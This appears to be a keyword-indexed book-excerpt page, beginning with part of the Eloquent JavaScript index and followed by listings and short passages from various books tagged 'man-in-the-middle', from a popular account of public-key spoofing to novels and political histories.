14 properties, 72 representation, 15 searching, 73 String function, 28, 105 stroke method, 290–292 strokeRect method, 289, 421 strokeStyle property, 290 strokeText method, 295 stroking, 289, 290, 295, 306 strong (HTML tag), 235, 237 structure, 168, 222, 227, 334 Structure and Interpretation of Computer Programs, 202 structure sharing, 79 style, 237 style (HTML tag), 238, 239 style attribute, 237–239, 273 style sheet, see CSS subclass, 111 submit, 318, 320, 321 submit event, 321, 384, 425 substitution, 54 subtraction, 13, 113 sum function, 5, 78 summing (exercise), 78, 409 summing example, 4, 83, 89, 211 superclass, 111 survey, 294 Sussman, Gerald, 202 SVG, 287–289, 305, 306 swapping bindings, 424 swipe, 342 switch keyword, 34 symbiotic relationship, 183 symbol, 106 Symbol function, 106 Symbol.iterator symbol, 107 SymmetricMatrix class, 111 synchronization, 387, 426 synchronous programming, 182, 195, 359, 368 syncState method, 335, 338, 340, 341, 349, 426 syntax of Egg, 203, 204 error, 26, 129, 130 expression, 23 function, 42, 45 identifier, 26 number, 12, 165 object, 63 operator, 13 statement, 24, 26, 28–34, 135 string, 14 syntax tree, 204–205, 207, 228–229 SyntaxError type, 206 T tab character, 14, 32 TAB key, 320 tabbed interface (exercise), 262, 419 tabindex attribute, 252, 320, 349 table (HTML tag), 243, 266, 274, 422 table example, 417 tableFor function, 68 tables, 67, 68, 274 tags, 221–222, 227, 239, see also names of specific tags talk, 371, 372, 377–379 talkResponse method, 380 talksAbout function, 231 talkURL function, 383 Tamil, 87 tampering, 317 tangent, 75 target property, 250 task management example, 71 TCP, 220, 221, 311, 373 td (HTML tag), 243, 274 Tef, 166 temperature example, 110 template, 171, 388, 426 template literals, 15 tentacle (analogy), 25, 63, 65 terminal, 354 termite, 183 ternary operator, 18, 20, 209 test method, 146 test runners, 132 test suites, 132 testing, 125, 132 text, 14, 221, 222, 227, 229, 295, 305–307, 322, 324, 358, 422 text 
field, 257, 318, 319, 322 text method, 315 text node, 229, 231, 233, 419 text wrapping, 305 text-align (CSS), 243 textAlign property, 295, 420 textarea (HTML tag), 260, 318, 322, 327, 330, 425 textBaseline property, 295, 420 textContent property, 418, 422 TEXT_NODE code, 229, 419 textScripts function, 94, 411 th (HTML tag), 243 then method, 186–188, 191, 416 theory, 133 this binding, 62, 98–99, 101, 130 thread, 182, 183, 198, 259 throw keyword, 135, 136, 139, 141, 413 tile, 303 time, 147, 148, 150, 184, 241, 261, 277, 278, 280, 283, 303, 346 time zone, 150 timeline, 182, 197, 223, 241, 247, 258 timeout, 188, 259, 373, 374, 380 Timeout class, 189 times method, 269 timing, 396 title, 382 title (HTML tag), 222, 223 toDataURL method, 344 toLowerCase method, 62, 243 tool, 145, 164, 175, 334, 339, 340, 342–344, 347, 350, 357 tool property, 335 ToolSelect class, 340 top (CSS), 240–242, 244 top-level scope, see global scope toString method, 99, 100, 103–105, 346, 362 touch, 255, 334 touchend event, 255 touches method, 278 touches property, 255, 339 touchmove event, 255, 339, 350 touchstart event, 255, 337, 339 toUpperCase method, 62, 132, 243, 362 tr (HTML tag), 243, 274 trackKeys function, 282, 285 transform (CSS), 287 transformation, 297–299, 308, 420 translate method, 298, 299 Transmission Control Protocol, 220, 221, 311, 373 transparency, 289, 296, 346 transpilation, 213 trapezoid, 307, 420 traversal, 152 tree, 100, 204, 229 treeGraph function, 394 trial and error, 133, 282, 293 triangle (exercise), 37, 407 trigonometry, 75, 241 trim method, 73, 268 true, 16 trust, 224 try keyword, 136, 137, 190, 413, 422 type, 12, 16, 112 type attribute, 318, 321 type checking, 131, 174 type coercion, 18, 19, 28 type observation, 392, 401, 403 type property, 204, 249 type variable, 131 typeof operator, 16, 80, 410 TypeScript, 131–132 typing, 260 typo, 129 U Ullman, Ellen, xx unary operator, 16, 23 uncaught exception, 138, 188 undefined, 18, 19, 25, 42, 47, 61, 63, 77, 129, 130, 134 
underline, 237 underscore character, 26, 35, 98, 151, 157 undo history, 346, 347 UndoButton class, 347 Unicode, 15, 17, 87, 92, 147, 162, 163 unicycling, 371 Uniform Resource Locator, see URL uniformity, 204 uniqueness, 239 unit (CSS), 242, 257 Unix, 366–368 Unix time, 150 unlink function, 359, 366 unshift method, 71 unwinding the stack, 135 upcasing server example, 362 updated method, 378, 381, 425 updateState function, 336 upgrading, 169 upload, 325 URL, 221, 224, 288, 313, 315, 317, 360, 373, 383 URL encoding, 314 url package, 364, 380 urlToPath function, 364 usability, 251 use strict, 130 user experience, 247, 320, 372, 383 user interface, 138, 334 users’ group, 371 UTF-8, 358, 359 UTF-16, 15, 92 V V8, 398 validation, 134, 140, 203, 277, 321, 378, 379 value, 12, 186 value attribute, 318, 322, 324 var keyword, 25, 43, 76 variables, see also binding Vec class, 113, 268, 269, 280, 394, 396, 421 vector, 394, 400 vector (exercise), 113, 411 vector graphics, 295 verbosity, 46, 182 version, 169, 222, 312, 357, 398 viewport, 275–277, 301, 302, 305 VillageState class, 119 virtual keyboard, 252 virtual world, 117, 119, 121 virus, 224 vocabulary, 41, 84 void operator, 26 volatile data storage, 12 W waitForChanges method, 380 waiting, 184 walking, 303 warning, 357 wave, 271, 280, 281 web, see World Wide Web web application, 5, 326, 333 web browser, see browser web page, 174 web worker, 259 WebDAV, 369 webgl (canvas context), 289 website, 224, 225, 313, 353, 369, 371 WebSockets, 373 weekDay module, 169–170 weekend project, 369 weresquirrel example, 60, 62, 64, 66, 69, 71 while loop, 4, 30, 32, 53, 160 whitespace in HTML, 231, 340, 419 indentation, 32 matching, 147, 162 syntax, 204, 206, 214, 417 trimming, 73, 268 in URLs, 373–374 Why’s (Poignant) Guide to Ruby, 22 width property, 350, 423 window, 250, 255, 258 window object, 248 with statement, 131 word boundary, 151 word character, 147, 151, 162 work list, 124, 343 workbench (exercise), 330, 422 world, of a game, 265 World 
Wide Web, 5, 77, 219, 221, 224, 225, 311 writable stream, 360–363, 364 write method, 360, 361 writeFile function, 359, 361, 425 writeHead method, 360 writing code, 6, 117 writing system, 87 WWW, see World Wide Web X XML, 230, 288 XML namespace, 288 xmlns attribute, 288 Y yield (reserved word), 26 yield keyword, 197 your own loop (example), 95 Yuan-Ma, 10, 352 Z Zawinski, Jamie, 144 zero-based counting, 56, 61, 150 zeroPad function, 54 zigzag shape, 420 zooming, 305 Eloquent JavaScript, 3rd Edition is set in New Baskerville, Futura, Dogma, and TheSansMono Condensed.


Crypto: How the Code Rebels Beat the Government Saving Privacy in the Digital Age by Steven Levy

Albert Einstein, Claude Shannon: information theory, cognitive dissonance, computer age, Donald Knuth, Eratosthenes, Extropian, invention of the telegraph, John Markoff, Kevin Kelly, knapsack problem, Marc Andreessen, Mitch Kapor, MITM: man-in-the-middle, Network effects, new economy, NP-complete, Ronald Reagan, Saturday Night Live, Silicon Valley, Simon Singh, Stephen Hawking, Steven Levy, Watson beat the top human players on Jeopardy!, web of trust, Whole Earth Catalog, zero-sum game, Zimmermann PGP, éminence grise

The classic conundrum in such systems arises when Alice wants to send something to Bob. She scrambles it with Bob’s public key, and only Bob can unscramble it. But what if Alice has never met Bob—how does she get his public key? If she asks him for it directly, she can’t encode her request (obviously not, because she doesn’t have his public key yet, which she would use to encrypt the message). So a potential eavesdropper, Eve, could act as “a man in the middle,” and snatch that message en route. Then Eve, pretending to be Bob, could send her own public key to Alice, falsely representing it as Bob’s key. (This deceptive masquerade is known as “spoofing.”) If Alice is duped, she’ll encode her secret message to Bob with the key. Alas, Bob won’t be able to read anything scrambled with that key—only tricky Eve can. So much for the security of direct requests.


Reaganland: America's Right Turn 1976-1980 by Rick Perlstein

"Robert Solow", 8-hour work day, affirmative action, airline deregulation, Alistair Cooke, American Legislative Exchange Council, anti-communist, Ayatollah Khomeini, Berlin Wall, Bernie Sanders, Brewster Kahle, business climate, clean water, collective bargaining, colonial rule, COVID-19, Covid-19, creative destruction, crowdsourcing, cuban missile crisis, currency peg, death of newspapers, defense in depth, Deng Xiaoping, desegregation, Donald Trump, energy security, equal pay for equal work, facts on the ground, feminist movement, financial deregulation, full employment, global village, Golden Gate Park, illegal immigration, In Cold Blood by Truman Capote, index card, indoor plumbing, Internet Archive, invisible hand, Julian Assange, Kitchen Debate, kremlinology, land reform, Marshall McLuhan, mass immigration, MITM: man-in-the-middle, Monroe Doctrine, moral panic, mutually assured destruction, New Journalism, oil shock, open borders, Potemkin village, price stability, Ralph Nader, RAND corporation, rent control, road to serfdom, Robert Bork, rolodex, Ronald Reagan, Rosa Parks, Saturday Night Live, Silicon Valley, traveling salesman, unemployed young men, union organizing, unpaid internship, Unsafe at Any Speed, Upton Sinclair, upwardly mobile, urban decay, urban planning, urban renewal, wages for housework, walking around money, War on Poverty, white flight, WikiLeaks, Winter of Discontent, yellow journalism, Yom Kippur War, zero-sum game

guns at Pearl Harbor Thomas W. Cutrer and T. Michael Parrish, “How Dorie Miller’s Bravery Helped Fight Navy Racism,” World War II Magazine, October 31, 2019. “like overripe fruit” Richard Reeves, President Reagan: The Triumph of Imagination (New York: Simon & Schuster, 2005), 154; Robert Welch, The Blue Book of the John Birch Society (Belmont, MA: Western Islands, 1961) 11. “You remember Nancy” Jack Germond, Fat Man in the Middle Seat: Forty Years of Covering Politics (New York: Random House, 1999), 155. prospects of Jack Kemp ENIR, July 24, 1978. “Maybe it wouldn’t” Los Angeles Times Service, December 7, 1976. dinner at Stanford George Schultz, Turmoil and Triumph: My Years as Secretary of State (New York: Scribner, 1993). Bohemian Grove July 28, 1978, RRPL, Box 59. first day back July 31, 1978, ibid. margin of 37 to 31 percent George Gallup column, August 13, 1978.

Panhandle of West Virginia AP, July 13, 1979. The Pittsburgh Press’s article “Here’s Partial List of Open Stations,” “How Carter’s Carnegie Visit Was Kept a Secret,” “Violence Threatened If Fuel Redistributed,” “Carter, Residents Hold Mini-Summit,” all on page A-4, Pittsburgh Press, July 13, 1979. “They were pleased” Carter, White House Diary, 343. “almost frightening” Jack Germond, Fat Man in the Middle Seat: Forty Years of Covering Politics (New York: Random House, 1999), 136. Then came a final meeting Gordon Stewart, “Carter’s Speech Therapy,” NYT, July 14, 1979; Schlesinger, White House Ghosts, 302. Camp David movie theater Schlesinger, White House Ghosts, 303–4; Hendrik Hertzberg, “A Very Merry Malaise,” NewYorker.com, July 17, 2009. “Inside ten minutes” Jules Witcover and Jack Germond, Blue Smoke and Mirrors: How Reagan Won and Why Carter Lost the Election of 1980 (New York: Viking, 1981), 30.

“DC-10s have replaced” RRB 79-09, track A4, “Nuclear Power,” recorded June 29, 1979, RPV, 454. wandering into staff meetings See n.d. notes, early 9/79, page 8, “No nation can survive under fiat money”; “Meeting on Public Policy Issues,” September 6, 1979; both RRPL, Box 103, “Meetings—9/1979” folder. See also PH, Box 11, Fred Iklé, for working drafts of fall 1979 policy position statements. Germond was skeptical Jack Germond, Fat Man in the Middle Seat: Forty Years of Covering Politics (New York: Random House, 1999), 150–52. vituperation directed at Jackson Ian Shapiro, The Last Great Senate: Courage and Statesmanship in Times of Crisis (New York: Public Affairs Books, 2012), 292. North American Aerospace Defense Command July 30 and July 31, 1979, schedule, RRPL, Box 76; Frances FitzGerald, Way Out There in the Blue: Reagan, Star Wars, and the End of the Cold War (New York: Simon & Schuster, 2000), 20–21; Robert Scheer, With Enough Shovels: Reagan, Bush, and Nuclear War (New York: Random House, 1982), 104, 232.


pages: 478 words: 149,810

We Are Anonymous: Inside the Hacker World of LulzSec, Anonymous, and the Global Cyber Insurgency by Parmy Olson

4chan, Asperger Syndrome, bitcoin, call centre, Chelsea Manning, corporate governance, crowdsourcing, Firefox, hive mind, Julian Assange, Minecraft, MITM: man-in-the-middle, Occupy movement, peer-to-peer, pirate software, side project, Skype, speech recognition, Stephen Hawking, Stuxnet, We are Anonymous. We are Legion, We are the 99%, web application, WikiLeaks, zero day

My own observation of DigitalGangsters.com showed posts advertising jobs that required hacking into websites via SQL injection, stealing databases of names and e-mail addresses, or just stealing addresses and sending them to spammers. A database with passwords was worth more, since spammers could then send spam from legitimate addresses. Occasionally a thread would start with a post seeking “freelancers” who could program in C, Objective-C, C#, VB, Java, and JavaScript. One post from June of 2010 had the title “DGs [Digital Gangsters] in Washington? Be my mail man in the middle,” followed by: “Heres how it works. A delivery gets shipped to your address, You open the package remove item, Reship the item to me in a new container with a false return address. when item arrives you get paid. interested?” The description of Jin-Soo Byun was sourced from interviews with Jennifer Emick and Laurelai Bailey; the note that Aaron Barr was helping her investigation was sourced from an interview with Barr.


pages: 489 words: 148,885

Accelerando by Stross, Charles

business cycle, call centre, carbon-based life, cellular automata, cognitive dissonance, commoditize, Conway's Game of Life, dark matter, dumpster diving, Extropian, finite state, Flynn Effect, glass ceiling, gravity well, John von Neumann, Kickstarter, knapsack problem, Kuiper Belt, Magellanic Cloud, mandelbrot fractal, market bubble, means of production, MITM: man-in-the-middle, orbital mechanics / astrodynamics, packet switching, performance metric, phenotype, planetary scale, Pluto: dwarf planet, reversible computing, Richard Stallman, SETI@home, Silicon Valley, Singularitarianism, slashdot, South China Sea, stem cell, technological singularity, telepresence, The Chicago School, theory of mind, Turing complete, Turing machine, Turing test, upwardly mobile, Vernor Vinge, Von Neumann architecture, web of trust, Y2K, zero-sum game

So after a distracted irritated fit of play – which leaves the toyspace in total disarray, Sendak-things cowering under a big bass drum – Manni gets bored. And because he's still basically a little kid, and not fully in control of his own metaprogramming, instead of adjusting his outlook so that he isn't bored anymore, he sneaks out through his bedroom gate (which big-Manni-ghost reprogrammed for him some time ago so that it would forward to an underused public A-gate that he'd run a man-in-the-middle hack on, so he could use it as a proxy teleport server) then down to the underside of Red Plaza, where skinless things gibber and howl at their tormentors, broken angels are crucified on the pillars that hold up the sky, and gangs of semiferal children act out their psychotic fantasies on mouthless android replicas of parents and authorities. Lis is there, and Vipul and Kareen and Morgan.


pages: 537 words: 149,628

Ghost Fleet: A Novel of the Next World War by P. W. Singer, August Cole

3D printing, Admiral Zheng, augmented reality, British Empire, digital map, energy security, Firefox, glass ceiling, global reserve currency, Google Earth, Google Glasses, IFF: identification friend or foe, Just-in-time delivery, low earth orbit, Maui Hawaii, MITM: man-in-the-middle, new economy, old-boy network, RAND corporation, reserve currency, RFID, Silicon Valley, Silicon Valley startup, South China Sea, sovereign wealth fund, stealth mode startup, trade route, Wall-E, We are Anonymous. We are Legion, WikiLeaks, zero day, zero-sum game

At the elevator door, the commandos stood in silence. Wang wondered where they would take him next. Then he noticed that they were tensing up as the elevator lights numbered ever closer to their floor. The door opened and another armed phalanx emerged; these bodyguards were Caucasian in ethnicity and wearing civilian suits, but they were clearly military. While the two groups eyed each other warily, Wang watched how the elderly man in the middle didn’t bother even to look up from the outdated computer tablet he tapped away on. Red diamonds and purple hearts reflected in his traditional eyeglasses. He was surprisingly fit for his age, but supposedly the old Russian spy was addicted to memory-improving games, an effort to stave off what Directorate intelligence suspected was dementia. A strong body still, but not the mind. So, Wang realized, this had not been a strategy session but an audition.


pages: 559 words: 155,372

Chaos Monkeys: Obscene Fortune and Random Failure in Silicon Valley by Antonio Garcia Martinez

Airbnb, airport security, always be closing, Amazon Web Services, Burning Man, Celtic Tiger, centralized clearinghouse, cognitive dissonance, collective bargaining, corporate governance, Credit Default Swap, crowdsourcing, death of newspapers, disruptive innovation, drone strike, El Camino Real, Elon Musk, Emanuel Derman, financial independence, global supply chain, Goldman Sachs: Vampire Squid, hive mind, income inequality, information asymmetry, interest rate swap, intermodal, Jeff Bezos, Kickstarter, Malcom McLean invented shipping containers, Marc Andreessen, Mark Zuckerberg, Maui Hawaii, means of production, Menlo Park, minimum viable product, MITM: man-in-the-middle, move fast and break things, move fast and break things, Network effects, orbital mechanics / astrodynamics, Paul Graham, performance metric, Peter Thiel, Ponzi scheme, pre–internet, Ralph Waldo Emerson, random walk, Ruby on Rails, Sam Altman, Sand Hill Road, Scientific racism, second-price auction, self-driving car, Silicon Valley, Silicon Valley startup, Skype, Snapchat, social graph, social web, Socratic dialogue, source of truth, Steve Jobs, telemarketer, undersea cable, urban renewal, Y Combinator, zero-sum game, éminence grise

If my reading of YC’s and Paul Graham’s essays was correct, then bomb-throwing anarchist subversive mixed with cold-blooded execution mixed with irreverent whimsy, a sort of technology-enabled twelve-year-old boy, was precisely the YC entrepreneur profile. Figure out a point of overlooked business or technical leverage, interpose some piece of cleverness, and gleefully marvel at the resulting disruption (or destruction). In that spirit did we respond to my favorite question on the YC application:* What (non-computer) system have you ever hacked? I conducted a man-in-the-middle attack on Craigslist’s online dating ads. I posted an ad as a woman looking for a man, and as a man looking for a woman. I’d pass email from real man to fictional woman as the replies of fictional man to the real women, and basically crossed the email streams. At one point I shifted each real person off my fictional email addresses, and to the corresponding opposite-sex real email addresses.


What We Cannot Know: Explorations at the Edge of Knowledge by Marcus Du Sautoy

Albert Michelson, Andrew Wiles, Antoine Gombaud: Chevalier de Méré, Arthur Eddington, banking crisis, bet made by Stephen Hawking and Kip Thorne, Black Swan, Brownian motion, clockwork universe, cosmic microwave background, cosmological constant, dark matter, Dmitri Mendeleev, Edmond Halley, Edward Lorenz: Chaos theory, Ernest Rutherford, Georg Cantor, Hans Lippershey, Harvard Computers: women astronomers, Henri Poincaré, invention of the telescope, Isaac Newton, Johannes Kepler, Magellanic Cloud, mandelbrot fractal, MITM: man-in-the-middle, Murray Gell-Mann, music of the spheres, Necker cube, Paul Erdős, Pierre-Simon Laplace, Richard Feynman, Skype, Slavoj Žižek, Solar eclipse in 1919, stem cell, Stephen Hawking, technological singularity, Thales of Miletus, Turing test, wikimedia commons

It takes place on a train (as many things do in relativity). Two people with identical guns are standing at either end of the train. Exactly halfway between them is a third member of the gang. The train is racing through a station. A police officer is watching the scene. Let me first consider the situation on the train. As far as the gang members are concerned, the train can be considered at rest. The guns go off. The bullets hit the man in the middle at the same time. The speed of the bullets and the distance they have to cover is the same, and as far as everyone on the train is concerned the gunmen both shot at the same moment. Indeed, the victim saw light flash from the guns at the same moment, just before being hit by the bullets. But what about the perspective of the police officer? Let’s suppose the victim passes the police officer at precisely the moment both flashes of light reach the victim, so that the police officer witnesses the flashes at the same time too.


Days of Fire: Bush and Cheney in the White House by Peter Baker

addicted to oil, anti-communist, battle of ideas, Berlin Wall, Bernie Madoff, Bob Geldof, buy low sell high, card file, clean water, collective bargaining, cuban missile crisis, desegregation, drone strike, energy security, facts on the ground, failed state, Fall of the Berlin Wall, friendly fire, guest worker program, hiring and firing, housing crisis, illegal immigration, immigration reform, Mikhail Gorbachev, MITM: man-in-the-middle, Robert Bork, Ronald Reagan, Ronald Reagan: Tear down this wall, Saturday Night Live, South China Sea, stem cell, too big to fail, uranium enrichment, War on Poverty, working poor, Yom Kippur War

CHAPTER 17: “WE WERE ALMOST ALL WRONG” 1 “I sure wasn’t going to”: Mary Cheney, Now It’s My Turn, 173–78. 2 “If you feel like you have to”: Ibid. 3 Five picked Gephardt: Gillespie, Winning Right, 51. 4 Jenna dreamed that her father: Thomas and the Staff of Newsweek, Election 2004, xix. 5 “Dean ran an ad with me”: Dick Gephardt, author interview. 6 “He’s done, it’s over”: Matt Schlapp and Dan Bartlett, author interviews. 7 Kerry won with 38 percent: New Hampshire Secretary of State’s office, http://www.sos.nh.gov/presprim2004/dpressum.htm. 8 “Let me begin by saying”: David Kay, testimony before the Senate Armed Services Committee, January 28, 2004, http://www.cnn.com/2004/US/01/28/kay.transcript/. 9 “Why would Saddam do something”: David Kay, author interview. 10 “was the right thing to do”: Colin Powell, interview with the Washington Post, excerpts printed February 3, 2004. 11 “It was something we all”: Barry Schweid, “Powell Says War Decision Was Correct Even If Weapon Stockpiles Did Not Exist,” Associated Press, February 3, 2004. 12 “despite some public statements”: George Tenet, speech at Georgetown University, February 5, 2004, https://www.cia.gov/news-information/speeches-testimony/2004/tenet_georgetownspeech_02052004.html. 13 declined to embrace: Sheryl Stolberg, “White House Avoids Stand on Gay Marriage Measure,” New York Times, July 2, 2003, http://www.nytimes.com/2003/07/02/us/white-house-avoids-stand-on-gay-marriage-measure.html. 14 “heard more about marriage”: Goeglein, Man in the Middle, 120. 15 Bush invited Cheney and top aides: Halperin and Harris, Way to Win, 254–55. 16 “There is a strong sense”: Undated campaign memo, provided to author. 17 “That decision influenced everything”: Matthew Dowd, interview with PBS’s Frontline, January 4, 2005, http://www.pbs.org/wgbh/pages/frontline/shows/architect/interviews/dowd.html. 18 “We have, I reminded him”: Laura Bush, Spoken from the Heart, 302–3. 19 “He brought up the fact”: Dick Cheney, author interview. 20 “Cheney was pissed off”: Cheney friend, author interview. 21 “The union of a man and”: George W.

Gerhart, Ann. The Perfect Wife: The Life and Choices of Laura Bush. New York: Simon & Schuster, 2004. Gerson, Michael J. Heroic Conservatism: Why Republicans Need to Embrace America’s Ideals (and Why They Deserve to Fail if They Don’t). San Francisco: HarperOne, 2007. Gillespie, Ed. Winning Right: Campaign Politics and Conservative Policies. New York: Threshold, 2006. Goeglein, Tim. The Man in the Middle: An Inside Account of Faith and Politics in the George W. Bush Era. Nashville: B&H, 2011. Goldsmith, Jack L. The Terror Presidency: Law and Judgment Inside the Bush Administration. New York: W. W. Norton, 2007. Gordon, Michael, and Bernard E. Trainor. Cobra II: The Inside Story of the Invasion and Occupation of Iraq. New York: Pantheon, 2006. ———. The Endgame: The Hidden History of America’s Struggle to Build Democracy in Iraq.


pages: 598 words: 172,137

Who Stole the American Dream? by Hedrick Smith

Affordable Care Act / Obamacare, Airbus A320, airline deregulation, anti-communist, asset allocation, banking crisis, Bonfire of the Vanities, British Empire, business cycle, business process, clean water, cloud computing, collateralized debt obligation, collective bargaining, commoditize, corporate governance, Credit Default Swap, credit default swaps / collateralized debt obligations, currency manipulation / currency intervention, David Brooks, Deng Xiaoping, desegregation, Double Irish / Dutch Sandwich, family office, full employment, global supply chain, Gordon Gekko, guest worker program, hiring and firing, housing crisis, Howard Zinn, income inequality, index fund, industrial cluster, informal economy, invisible hand, Joseph Schumpeter, Kenneth Rogoff, Kitchen Debate, knowledge economy, knowledge worker, laissez-faire capitalism, late fees, Long Term Capital Management, low cost airline, low cost carrier, manufacturing employment, market fundamentalism, Maui Hawaii, mega-rich, MITM: man-in-the-middle, mortgage debt, negative equity, new economy, Occupy movement, Own Your Own Home, Paul Samuelson, Peter Thiel, Plutonomy: Buying Luxury, Explaining Global Imbalances, Ponzi scheme, Powell Memorandum, Ralph Nader, RAND corporation, Renaissance Technologies, reshoring, rising living standards, Robert Bork, Robert Shiller, rolodex, Ronald Reagan, shareholder value, Shenzhen was a fishing village, Silicon Valley, Silicon Valley startup, Steve Jobs, The Chicago School, The Spirit Level, too big to fail, transaction costs, transcontinental railway, union organizing, Unsafe at Any Speed, Vanguard fund, We are the 99%, women in the workforce, working poor, Y2K

Bush, the White House, and the Education of Paul O’Neill (New York: Simon & Schuster, 2004), 150. 8 That very morning “Key Goals Face Early Obstacles,” The Washington Post, February 27, 2001. 9 An NBC/Wall Street Journal poll “Public Buys Bush’s Tax-Cut Plan, but Details Magnify Differences,” The Wall Street Journal, March 8, 2001. 10 An even stronger tilt “Poll Analysis: Bush in Honeymoon Period,” Los Angeles Times, March 8, 2001. 11 “Washington derives so much of its power” Stevenson, “Itching to Rebuild the Tax Law.” 12 “Dirk is always well positioned” Jeffrey Birnbaum, “The Man in the Middle,” CNNMoney.​com, April 1, 2002, http://​money.​cnn.​com. 13 “That coalition was very important” Jensen, Salant, and Forsythe, “Bush Relies on Corporate Lobbyists.” 14 “The President has it backwards” “Bush Pushes Huge Tax Cut in U.S. Congress Debut,” Dallas Morning News, February 28, 2001. 15 Protests in several cities “Union Campaigns to Thwart Tax Cut Plan,” Atlanta Daily World, April 8, 2001. 16 Bush was the one urging voters Marc Lacey, “Bush Deploys Charm on Daschle in Pushing Tax Cut,” The New York Times, March 10, 2001. 17 A staggering $2 billion Jensen, Salant, and Forsythe, “Bush Relies on Corporate Lobbyists.” 18 The Business Roundtable The Center for Responsive Politics reported business interests pouring $333 million into the 2009–10 election campaign cycle.


pages: 600 words: 165,682

The Accidental Empire: Israel and the Birth of the Settlements, 1967-1977 by Gershom Gorenberg

anti-communist, bank run, colonial rule, facts on the ground, illegal immigration, MITM: man-in-the-middle, old-boy network, urban planning, Yom Kippur War

Meanwhile, the question of Samaria kept “coming up with longing and pain. As the years passed, the pain and shame became stronger,” Katzover recalled—shame that there was “empty territory,” that “the whole world sees…Samaria is empty.” In 1972 the idea still did not occur to Katzover that he would do something about it himself. But in his testimony, as in Etzion’s, is the first scent of an intoxicating impatience.39 THE MOST impatient man in the Middle East, though, was Anwar al-Sadat. Egypt’s leader wanted the Sinai Peninsula back. Recalling the lessons of his Nile Delta peasant childhood, speaking of neighbors who would fight for fifty years over a meter of land, he said in a New York Times interview after taking power that “our land…means our honor here…and one dies for this honor.” Sadat was willing to do almost anything to get the Sinai.


pages: 678 words: 159,840

The Debian Administrator's Handbook, Debian Wheezy From Discovery to Mastery by Raphaël Hertzog, Roland Mas

bash_history, Debian, distributed generation, do-ocracy, en.wikipedia.org, failed state, Firefox, GnuPG, Google Chrome, Jono Bacon, MITM: man-in-the-middle, NP-complete, QWERTY keyboard, RFC: Request For Comment, Richard Stallman, Skype, SpamAssassin, Valgrind, web application, zero day, Zimmermann PGP

Version 9 brings two major changes compared to previous versions. First, the DNS server can now run under an unprivileged user, so that a security vulnerability in the server does not grant root privileges to the attacker (as was seen repeatedly with versions 8.x). Furthermore, Bind supports the DNSSEC standard for signing (and therefore authenticating) DNS records, which allows blocking any spoofing of this data during man-in-the-middle attacks. CULTURE DNSSEC The DNSSEC norm is quite complex; this partly explains why it's not in widespread usage yet (even if it perfectly coexists with DNS servers unaware of DNSSEC). To understand all the ins and outs, you should check the following article. → http://en.wikipedia.org/wiki/Domain_Name_System_Security_Extensions 10.6.2. Configuring Configuration files for bind, irrespective of version, have the same structure.


pages: 604 words: 165,488

Mr Five Per Cent: The Many Lives of Calouste Gulbenkian, the World's Richest Man by Jonathan Conlin

accounting loophole / creative accounting, anti-communist, banking crisis, British Empire, carried interest, Ernest Rutherford, estate planning, Fellow of the Royal Society, light touch regulation, MITM: man-in-the-middle, Network effects, Pierre-Simon Laplace, rent-seeking, stakhanovite, Yom Kippur War

Bénard et Jarislowsky, Louis Dreyfus, Gulbenkian and the Syndicat des Banquiers de Province all had 15 per cent participations; Bemberg 10 per cent; Hirsch and Thalmann split the remaining 30 per cent between themselves. LDN00043. 30. ‘Siyasiyat: İstikraz Etrafında’, Tanin, 19 August 1910, p. 1. 31. Bompard to MAE, 17 October 1910. AMAE, CP Turquie 366, f. 90. For another perspective, see reports of 18 August and 17 September 1910. MBZ, CP Turquie 1909–10, ff. 69, 79. 32. ‘İstikraz Hakkında: Cavit Bey’in Beyanatı’, Tanin, 23 August 1910, p. 1. 33. For Laurent, see Ozan Ozavci, ‘A Man in the Middle: The Mission of Charles Laurent and the Young Turks’, in Gokhan Çetinsaya and Gül Tokay (eds.), Festschrift to Feroze A. K. Yasamee (Istanbul: ISIS Publications, forthcoming). 34. Le Temps, 20 September 1910. Hüseyin Cahit immediately picked up on this story, citing Le Temps as his source. ‘Yeni İstikraz’, Tanin, 20 September 1910, p. 1. 35. Cassel to CSG, 26 September 1910. LDN00039. 36.


pages: 577 words: 171,126

Light This Candle: The Life & Times of Alan Shepard--America's First Spaceman by Neal Thompson

Charles Lindbergh, Columbine, cuban missile crisis, Donald Trump, MITM: man-in-the-middle, Norman Mailer, place-making, Silicon Valley, William Langewiesche

That made some of the press happy but earned Shorty complaints from NASA and the astronauts that he was exploiting the Mercury Seven. “I think all seven guys really enjoyed the exposure—they are human and they don’t mind seeing their names in the papers,” Shorty once said. “Yet, as test pilots, they instinctively rebelled at having to spend time with the news media.” That continuous problem of being the man in the middle would literally drive Shorty to drink. A lot. And drink would one day cost him his job and, eventually, his life. In an effort to smooth the feathers that his press policies had ruffled, Shorty one day gathered the seven in a room at Langley and tried to explain that many reporters continued to accuse him, and the astronauts, of giving the Life people special access. A couple of the astronauts said they’d heard such flak at their press conferences, but it wasn’t their job to make any of them happy.


pages: 554 words: 168,114

Oil: Money, Politics, and Power in the 21st Century by Tom Bower

addicted to oil, Ayatollah Khomeini, banking crisis, bonus culture, corporate governance, credit crunch, energy security, Exxon Valdez, falling living standards, fear of failure, forensic accounting, index fund, interest rate swap, kremlinology, LNG terminal, Long Term Capital Management, margin call, Mikhail Gorbachev, millennium bug, MITM: man-in-the-middle, Nelson Mandela, new economy, North Sea oil, offshore financial centre, oil shale / tar sands, oil shock, passive investing, peak oil, Piper Alpha, price mechanism, price stability, Ronald Reagan, shareholder value, short selling, Silicon Valley, sovereign wealth fund, transaction costs, transfer pricing, zero-sum game, éminence grise

Explorers using 3D and 4D seismic, horizontal drills, multilateral wells and smart infill drilling were likely to increase production from mature wells and revive dry ones to extract over 50 percent of the oil, as BP had accomplished at Thunder Horse. The world consumed about 30 billion barrels every year. Contrary to Campbell’s scenario, the problem was not how much oil was in the ground, but how much the producers would spend to extract it. Guy Caruso, the head of the EIA, was the man in the middle of the two sides’ increasingly sterile arguments. Appointed by the George W. Bush administration in 2002 after serving for 12 years as an energy analyst at the CIA, Caruso had won star status by correctly forecasting the 1973 crisis, but he had also been involved in the mistaken CIA forecast in 1977 that Russia would become a net oil importer. Twenty-six years later, he acknowledged his misunderstanding, and disparaged the pessimism among the peak oil advocates, who relied on conservative, erratic and inconsistent data when so much depended upon price and technology.


pages: 544 words: 168,076

Red Plenty by Francis Spufford

affirmative action, anti-communist, Anton Chekhov, asset allocation, Buckminster Fuller, clean water, cognitive dissonance, computer age, double helix, Fellow of the Royal Society, John von Neumann, Kickstarter, Kitchen Debate, linear programming, market clearing, MITM: man-in-the-middle, New Journalism, oil shock, Philip Mirowski, plutocrats, Plutocrats, profit motive, RAND corporation, Simon Kuznets, the scientific method

